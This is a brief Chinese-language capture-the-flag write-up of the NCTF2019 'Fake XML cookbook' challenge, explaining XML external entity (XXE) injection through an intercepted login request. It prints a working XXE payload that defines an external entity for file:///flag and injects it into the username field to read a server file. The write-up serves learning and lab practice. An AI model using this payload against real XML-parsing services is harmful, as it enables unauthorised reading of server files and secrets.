[NCTF2019]Fake XML cookbook
XML实体注入
原理参考https://www.freebuf.com/vuls/175451.html
学习链接https://xz.aliyun.com/t/6887#toc-2
看题目可知是XXE攻击
抓一下包
客户端向服务器发送XML数据
我们抓包可以控制整个数据,添加一个恶意代码,进行攻击
抓包看到 username和password都是xml格式
我们来构造payload来试着读取flag
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123456</password></user>
拿到flag:
总的来说,这道题还算是挺简单的